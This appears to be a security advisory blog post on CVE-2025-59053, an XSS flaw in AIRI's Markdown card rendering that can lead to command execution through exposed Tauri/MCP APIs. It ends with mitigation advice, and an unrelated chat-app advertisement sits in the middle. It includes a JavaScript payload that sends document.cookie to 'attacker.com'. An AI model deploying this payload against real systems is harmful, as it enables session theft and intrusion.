Overview
In this post, we delve into the details of a critical vulnerability (CVE-2025-59053) that affects AIRI, a self-hosted artificial intelligence-based Grok Companion. This vulnerability exposes systems to potential compromises and data leakage, warranting immediate attention. Given AIRI’s widespread use, this vulnerability could have far-reaching implications, especially in terms of cross-site scripting (XSS) and arbitrary command execution. As such, understanding this vulnerability and its mitigation is crucial for system administrators and cybersecurity professionals alike.
Vulnerability Summary
CVE ID: CVE-2025-59053
Severity: Critical (9.6 CVSS Severity Score)
Attack Vector: Web-based
Privileges Required: None
User Interaction: Required
Impact: System compromise and potential data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
AIRI | v0.7.2-beta.2
How the Exploit Works
The vulnerability exists in the Markdown content processing of AIRI. Specifically, the `useMarkdown` composable, which processes the Markdown content and the processed HTML, is rendered directly into the DOM using v-html. An attacker can exploit this weakness by creating a card file containing malicious HTML/JavaScript.
The exploit occurs when this malicious file is processed using the `highlightTagToHtml` function, which replaces template tags without HTML escaping. The processed content is then directly rendered using v-html, leading to an XSS attack.
What makes this vulnerability more dangerous is the exposed Tauri API, which can be called from the frontend. The MCP plugin further exposes a command execution interface function, allowing arbitrary command execution, thereby posing a severe threat to the system security.
Conceptual Example Code
The following is a conceptual example of how the vulnerability might be exploited:
const maliciousCard = `<!doctype html>
<html>
<body>
<script>
// Arbitrary JavaScript code
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>
</body>
</html>`;
// The malicious card is then processed using highlightTagToHtml and rendered using v-html
highlightTagToHtml(maliciousCard);This JavaScript code would send the user’s cookies to the attacker’s server, demonstrating one of many ways this vulnerability could be exploited. The attacker could also execute arbitrary system commands if they gain access to the MCP plugin’s command execution interface.
Mitigation
Users should update to v0.7.2-beta.3 as it fixes the issue. In instances where an immediate update is not feasible, employing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can temporarily mitigate the threat by detecting and blocking malicious activity. However, this is only a temporary solution, and applying the vendor patch should be a priority.
